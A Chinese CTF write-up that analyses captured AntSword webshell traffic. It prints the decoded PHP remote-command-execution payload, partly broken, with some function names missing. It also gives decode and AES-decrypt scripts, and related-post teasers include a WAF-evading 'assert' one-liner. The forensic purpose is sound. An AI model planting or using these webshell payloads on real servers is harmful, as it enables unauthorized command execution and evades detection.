2019 EIS高校安全运维赛 misc webshell

Parco的IT运维 2020-02-03

webshell

第一种思路:
1、菜刀都是http协议,发的包都是POST包,所以在显示过滤器下命令:http.request.method==POST
2019 EIS高校安全运维赛 misc webshell
2、右键,追踪tcp流,发现是蚁剑流量
2019 EIS高校安全运维赛 misc webshell
3、先对http请求的后面那部分进行chr解码,这里是chr16模式,找一个脚本

# -*- encoding: utf-8 -*-
import re

with open("shell.php", "r") as f:
    code = f.read()
    code = code[6:-2]
    code = re.sub("chr", "chr", code, flags=re.IGNORECASE)
    code = code.replace(".", "+")
    print(eval(code))

在线美化后,得到php代码的内容:

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out) {
    @session_start();
    $key='f5045b05abe6ec9b1e37fafa851f5de9';
    return @base64_encode(openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
}
;
;
function asoutput() {
    $output=ob_get_contents();
    ob_end_clean();
    echo "0897d";
    echo @asenc($output);
    echo "60c97";
}
ob_start();
try {
    $p=base64_decode($_POST["0xc461e86196f1a"]);
    $s=base64_decode($_POST["0x9ec3fa98a283f"]);
    $d=dirname($_SERVER["SCRIPT_FILENAME"]);
    $c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
    $r="{$p} {$c}";
    function fe($f) {
        $d=explode(",",@ini_get("disable_functions"));
        if(empty($d)) {
            $d=array();
        } else {
            $d=array_map('trim',array_map('strtolower',$d));
        }
        return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
    }
    ;
    function runcmd($c) {
        $ret=0;
        if(fe('system')) {
            @system($c,$ret);
        } elseif(fe('passthru')) {
            @passthru($c,$ret);
        } elseif(fe('shell_exec')) {
            print(@shell_exec($c));
        } elseif(fe('exec')) {
            @exec($c,$o,$ret);
            print(join("
",$o));
        } elseif(fe('popen')) {
            ($c,'r');
            while(($fp)) {
                print(@fgets($fp, 2048));
            }
            @pclose($fp);
        } elseif(fe('antsystem')) {
            @antsystem($c);
        } else {
            $ret = 127;
        }
        return $ret;
    }
    ;
    ($r." 2>&1");
    print ($ret!=0)?"ret={$ret}":"";
    ;
}
catch(Exception $e) {
    echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();

在第4行读到key,肯定要找密文了,在第6行读到涉及到AES128加密
4、追踪http流,用脚本AES解密最后一个包(三个都解了一下,发现最后一个能解出base64)

<?php

$cipher = "8c2b4kRD1eD+vSZ81FAJ6XClabCR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dZOTFg4DW9MYwG6k3rEvAAR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJHygVK0ad8xG1Qk6pzSaCiR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJ1qI47Cz1/qfnNoNARGhLfVhC0RJlfeKCvbPwpjFn//BSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93FIVjxEmVnLHPVr5M/LQPdxSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93GnMvJfVbvphfWnt17IOkzYjvv91k2fnYDR7u4nlGM3YitxGYGs9mn+HS5iJBXORtYrcRmBrPZp/h0uYiQVzkbWK3EZgaz2af4dLmIkFc5G1itxGYGs9mn+HS5iJBXORtUq4dBjDRFhDqDyzs9CScJhrd3yMusQ+qsnZkq4Ey7NVJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l2hDPuDhVN4TaDLzp9bXyfGeCVhvglAaNo2rA/ovnRTTtfA5ZywMOOijj6md5RItqjXwOWcsDDjoo4+pneUSLao18DlnLAw46KOPqZ3lEi2qNfA5ZywMOOijj6md5RItqgS0b9hS7r5TX9YNZo2awgUAyqVacVgwr1NlNQ2k/kihhh0QQfnjeGdZhkz0N0jAKiMzFmAMa7xQ1URxTaHoHjDg3NaWl/8+PVG+pyaKrbNDjfl77POeQE8+0MCHpz6YxWLJ6mwCe1X3uzz/HSHcHSvQBB8FxjOhugOErOXkd3LZi/60Gr4gIEc1JIxA5A2pE/V6Z/DFwNOR4M/IIIWdGr5e2e10";

function decrypt($cipher) {
    $key = 'f5045b05abe6ec9b1e37fafa851f5de9';
    return @base64_decode(openssl_decrypt(base64_decode($cipher), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
};

$cipher = substr($cipher, 5, strlen($cipher) - 10);
echo decrypt($cipher);

5、再base64解密一哈
第二种思路:
文件->导出对象->http,save all,13kb大小的是chr解密,解出的php代码有AES的key,也提示了AES,2kb大小的是aes的密文。

Parco的IT运维

Parco的IT运维

相关推荐

sqlmap从入门到精通-第四章-4-2 SQL Server获取webshell及提权基础

主要架构ASP+MSSQL+IIS或者ASP.NET+MSSQL+IIS ,PHP和JSP架构也是支持MSSQL. 通过翻查conn.aspx, config.aspx, conn.asp, config.asp, config.php, web.conf

bluet00 / 0评论 2020-06-25

腾讯Wiz课程第三讲,文件上传漏洞的分析

如果上传文件的路径、文件名、扩展名都是用户可控的数据,然后木马脚本就会在web服务器上面搞事情。有问题是在文件上传之后,服务器的处理方式、解释文件如果出现了问题,就会导致错误,就是漏洞的来源。文件上传时候审查不严。webshell常常被称为入侵者通过网站端

bigNoseLiu / 0评论 2020-06-15

MySQL提权之udf提权(无webshell的情况)

select @@basedir; //查找到mysql的目录select ‘It is dll‘ into dumpfile ‘C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCA

Jieen / 0评论 2020-05-30

web shell

可以上传任意文件的情况,包括上传脚本文件。非法用户可以利用上传的恶意脚本文件控制整个网站,甚至控制服务器。文件,又称之为 webshell,也可将 webshell 脚本称为一种网页后门,webshell 脚本具有强大。的功能,比如查看服务器目录,服务器中

酷云的csdn / 0评论 2020-05-28

加密Webshell“冰蝎” 流量 100%识别

0x01 "冰蝎" 获取密钥过程冰蝎执行流程 冰蝎在连接webshell的时,会对webshell进行两次请求访问为什么进行两次访问?0x04 总结Waf可以对一个ip连续访问2次的数据包进行截取,比对相同字符,比对之后,截取两次不同的

Sabrina / 0评论 2020-04-22

墨者学院WebShell文件上传分析溯源(第2题)Write

今天看文章看到一道比较有意思的题,复现并记录一下,友情提示,这个靶场经常经常经常出问题,如果发现路径无法访问等问题,重启解决就好~访问提示后台,访问admin/upload.php会显示没有权限,并有一个upload1.php页面一闪而过,随后跳转到upl

pimshell / 0评论 2020-04-06

阿里云网站被植入Webshell的解决方案

本文介绍了Webshell的概念、入侵原理以及防护方法,帮助您抵御Webshell入侵,避免其带来的数据泄露等危害。Webshell指匿名用户(入侵者)通过网站端口,获取网站服务器的一定操作权限。Webshell通常是以ASP、PHP、JSP、ASA或者C

伏雌摘星阁 / 0评论 2020-03-03

script webshell jspWebShell / pythonWebShell / phpWebShell

simplejee是一个开源的面向j2ee初学者的小项目。顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为匿名用户(入侵者)通过网站端口对网站服务器的某种程度上操作的

懒人的小窝 / 0评论 2011-06-11

浅谈无字母数字构造webshell

//$hint = "php function getFlag() to get flag";读一下代码,我们要对code进行传参,code的参数在经过变换后以不含字母数字的形式构造任意字符,并且字符串的长度小于40,但php7中,a

xiaobater / 0评论 2020-02-02

PHP利用Apache、Nginx的特性实现免杀Webshell

另外一种通过执行伪造的sessionid值,进行任意代码执行。

Jieen / 0评论 2019-12-30

p神之webshell禁止执行

也可以在结果发生后,不允许webshell执行

chenjia00 / 0评论 2019-12-31

代码注入/文件包含 弹出Meterpreter

目标设备存在远程文件包含漏洞或者命令注入漏洞,想在目标设备上加载webshell,但不想在目标设备硬盘上留下任何webshell文件信息。此模块支持在本地监听一个端口,别人一旦访问该端口就会将该端口内的文件读取至本地执行。

liushun / 0评论 2019-12-16

WINDOWS服务器IIS解析漏洞维护办法,防止WEBSHELL入侵!

本站服务器经过更换2012版后 网站经常被人拿WEBSHELL篡改文件!找了半天也找不到漏洞在哪好在微信好友Carry的帮忙下找出了漏洞,并给出了以下的修改方案我是根据方案3修复的,在这里给大家分享下

SciRui / 0评论 2019-12-14

注册表无法访问 解决方案

点按“确定”关闭对话框。

kxr00 / 0评论 2015-01-18

linux 取消上传文件存储目录执行脚本的权限防御WebShell攻击

所以漏洞的关键就在上传的目录是否具备执行脚本的权限上,很多设计者会基于降低成本的考虑,将存储上传文件的位置与Web应用程序放在同一服务器,甚至同一目录下,这样上传的目录也和Web应用程序一样具备执行脚本的权限,从而导致系统产生了一个高危上传漏洞。

jinkun00 / 0评论 2015-08-17

黑客必学之“网页木马webshell”

首先简单说一下webshell,webshell简单来说就是黑客植入的后门,它可以帮助我们黑客控制网站,就好像电脑木马控制电脑一样。我们可以jifeng=phpinfo()这个函数,然后执行,它就会正常去执行phpinfo(),那么jifeng就相当于一个

Yyqingmofeige / 0评论 2019-11-08

WebShell代码分析溯源(十一)

Tick是一个在declare代码段中解释器每执行n条低级语句就会发生的事件。

赵家小少爷 / 0评论 2019-11-03

WebShell代码分析溯源(九)

php $e = $_REQUEST[‘e‘];$arr = array;array_walk;?>

Sabrina / 0评论 2019-11-02

WebShell代码分析溯源(五)

首先使用REQUEST方法接收url中e参数传递的值,然后把$_POST[‘POST‘]赋值给arr数组,然后把arr数组中的每个键值传给base64_decode函数,最终构成一句话木马assert

Yyqingmofeige / 0评论 2019-11-01

WebShell代码分析溯源(四)

“^”为异或运算符,在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或运算,异或运算完,又将结果从二进制转换成了字符串。$_++,这行代码的意思是对变量名为”_”的变量进行自增操作,在PHP中未定义的变量默认值为null,null==fals

Sabrina / 0评论 2019-10-31

WebShell代码分析溯源(二)

php $POST[‘POST‘]=‘assert‘;$array[]=$POST;$array[0][‘POST‘];?>

Sabrina / 0评论 2019-10-30

Linux环境下用webshell对文件权限的修改

当我们拥有了一个linux下的shell。这个shell对所在站点的根目录有可写入权限,甚至能查看其他网站的目录。那么,这样的主机设置肯定是不安全的。有的时候,我们想对获得同服务器的其他站的权限,比如直接对其他站点的index.php进行修改,却发现没有权

linuxisperfect / 0评论 2010-12-13

Nginx下解决WebShell访问限制问题

char *pathbuf;char *ptr;char *end;char *env_doc_root;env_doc_root = estrdup(PG(doc_root));env_doc_root = sapi_getenv("DOCUM

王科 / 0评论 2010-06-15

PHP-WebShell-Bypass-WAF

WebShell 的输入点在$_GET和$_POST,执行点在eval(),经典的一句话WAF 都会拦截。可以发现,安全狗是通过综合判断来识别WebShell 的,现在,我们有两种的绕过方式:关键字绕过和混淆绕过。一般来说,WAF 里边的拦截规则都是使用了

Nicolase / 0评论 2019-10-20

注册表无法访问 解决方案

点按“确定”关闭对话框。

bigNoseLiu / 0评论 2015-01-18

【转】Nginx——防止webshell跨目录

此文解决了我主机上多虚拟主机用户权限控制的大难题,特此收藏备用!下面简单介绍一种nginx下防止多站点之间跨目录访问的方法:对每个站点采用不同的fastcgi端口进行处理.这里需要注意的是,fastcgi_pass unix:/tmp/php-cgi.so

pupur / 0评论 2012-03-19

什么是webshell

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp

无他唯程序尔 / 0评论 2016-02-03

php Meterpreter Webshell

这时可以在第二个终端中获得一个meterpretersession

CS笔记本 / 0评论 2014-11-16

黑客教程

觉得总结得特别不错,特转载。

tterminator / 0评论 2013-05-04

如何利用 Webshell 诊断 EDAS Serverless 应用

本文主要介绍 Serverless 应用的网络环境以及 Serverless 应用容器内的环境,了解背景知识以及基本的运维知识后可以利用 Webshell 完成基本的运维需求。Webshell 简介用户可以通过阿里云控制台直接获取 ECS 的 Shell,

shijinzhen / 0评论 2019-07-01

PHP常见过waf webshell以及最简单的检测方法

<?php. $a = base64_decode("YXNzYXNz+00000____");$a = substr_replace($a,"ert",3);$a($_POST['x']);>. <

xiejianming / 0评论 2019-06-25

[转]JSP的WEBSHELL源代码 ~~~~~~~~~~ 少见的东西 好东西值得收藏

* action=tunnel&remoteHost=192.168.0.1&remotePort=23&myPort=65534 -- 实现通过访问该webshell.jsp访问内网某主机telnet服务的功能。,适用于你控制的机

以梦为马不负韶华 / 0评论 2013-06-07

打造安全的Tomcat服务器

tomcat是一个开源Web服务器,基于Tomcat的Web运行效率高,可以在一般的硬件平台上流畅运行,因此,颇受Web站长的青睐。不过,在默认配置下其存在一定的安全隐患,可被恶意攻击。另外,由于其功能比较单纯需要我们进一步地进行设置。本机将从安全和功能两

rechanel / 0评论 2010-01-13

script webshell jspWebShell / pythonWebShell / phpWebShell

simplejee是一个开源的面向j2ee初学者的小项目。之前相关的一些文档是放在google code的wiki里的,现在在javaeye上开此专栏,以方便交流。有任何的意见和建议忘不吝赐教。最后声明一下,本项目是由一家开发公司维护的所以难免出现一些和该

CS笔记本 / 0评论 2011-06-11

webshell

顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为匿名用户(入侵者)通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也

huha / 0评论 2011-03-27

剖析PHP纯符号一句话webshell的代码

>以上是网上流传的一段由纯符号组成的一句话后门代码,这种代码混淆方法主要用以webshell免杀。下文将详细剖析这段看似复杂的PHP变形代码。此行实际上不影响代码执行效果,仅增加混淆效果。其实另外三个字符也适用,为了增加混淆效果故采用这种特殊字符。搞

JUMEING / 0评论 2014-04-07

WEBSHELL箱子系统V1.0收信箱子代码漏洞分析及解决方法

复制代码代码如下: <!

wangluowanglei / 0评论 2012-08-16

查找Centos Linux服务器上入侵者的WebShell后门

服务器被挂马或被黑的朋友应该知道,黑客入侵web服务器的第一目标是往服务器上上传一个webshell,有了webshell黑客就可以干更多的事 情。网站被挂马后很多人会束手无策,无从查起,其实并不复杂,这里我将以php环境为例讲几个小技巧,希望对大家有帮助

zhongzhiwei / 0评论 2012-07-09

十种获取webshell的方法

黑客在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。本篇文章将如何获取webshell总结成为了十种方法,希望广大的企业网络管理员能够通过了解获取webshell的途径,对企业自身进行防范。tx

xiaonamylove / 0评论 2015-09-20

webshell给六合彩网站毁灭性的打击

先在 baidu 搜 “六合专用BBS v1.0”当然你搜 v2.0 、v3.0 都可以!“找到相关网页约23,000篇,用时0.017秒”我们看一下非常多的,随便进一个吧。在里面加查找页 /fdnews.asp /bbs/fdnews.asp,好了现在我

Copywang / 0评论 2011-03-10

发掘MaosinCMS网站系统漏洞与测试

这种漏洞用工具是扫不到的,可以说注入已经由显式转为隐式了,必须查看源代码才有可能发现潜在的漏洞。不过想利用这个注入点,首先需要注册个普通用户。看到是在user_publish.asp文件出了安全问题,翻看代码发现真正的漏洞代码不在user_publish.

K黄 / 0评论 2011-03-10

eWebeditor漏洞的修补

各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。要不然,下一个被黑的就是你哦!e

Asukaaaa / 0评论 2011-03-10

服务器 提权方法大全

还有就是本文的题目是webshell下的服务器提权方法。在获取webshell后,我们常见的是看一下系统的服务,查看服务可以通过利用扫描器对服务器ip进行扫描,或是在webshell中有执行dos命令时查看net start来查看主机所开放的服务。有些主机

jiaxiaokai / 0评论 2009-09-29

webshell 提权方法 服务器提权教程

然后就可以在本地安装一个Serv-u,新建一个服务器, IP填对方IP,帐号为LocalAdministrator 密码为$ak#.1k;0@p">#1@$ak#.1k;0@p, 连接上后你就可以管理他的Serv-u了 ----------

whxwkb / 0评论 2009-09-29

黑客常用词汇集 入门必看!

webshell 就是web上面的操作界面(shell),简单地说,webshell就是你上传到服务器的的大马文件. 拿站 如果一个网站被你控制了(拿到了webshell,或者被你用灰鸽子控制了,但一般指拿到了webshell) R站 区别于 拿站(拿站只

xiaonamylove / 0评论 2009-09-28

webshell低权限重启服务器的另类方法

原理就是通过执行死循环导致cpu跑满,不得不重启服务器,windows系统下可以通过停止w3wp.exe的方法解决,然后重启iis什么的把下面的代码保存为chongqi.asp,然后在访问,会占用CPU很高,管理员会重启。复制代码代码如下: <% f

dsghre / 0评论 2012-10-16

怎么破解Webshell密码 Burpsuite破解Webshell密码图文教程

觰burpsuite pro v1.4.07+key¨è··è¤§°7.3MB°é2012-12-17èè。觰JAVAèè °è¤§°32MB°é2013-05-06BurpsuiteéèJAVA,è·èJAVA. ¨éèè¨è·èéè¨è¨°èW

Mygrowingroad / 0评论 2016-09-18

TNTHK小组内部版webshell密码破解方法

下面简单的揭露下怎么获取webshell后门密码google:TNTHK小组内部版文字版: 点开webshell 输入任意mima 提示错误 在提示错误页面右键源代码 ctrl+f password font后跟的就是webshell密码 图文版本:1.

流年浅滩 / 0评论 2013-09-16

webshell下执行CMD的小技巧分享

要是调用不到,只能传文件到执行目录。可是有些服务器BT,后来,干脆吧path填netpath:C:\windows\temp\net.execommand: "user". 大家举一反三。。。

Zaratustra / 0评论 2011-03-30